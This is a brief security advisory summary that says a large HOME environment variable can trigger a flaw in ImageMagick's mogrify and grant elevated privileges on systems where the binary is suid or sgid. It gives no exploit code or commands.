/usr/X11R6/bin/mogrify is part of ImageMagick, which is an image display and manipulation tool for the XWindow System. A security vulnerability in the way mogrify handles large HOME environment variable can be used to gain elevated privileges (note that not all operating systems have mogrify suid or sguid).
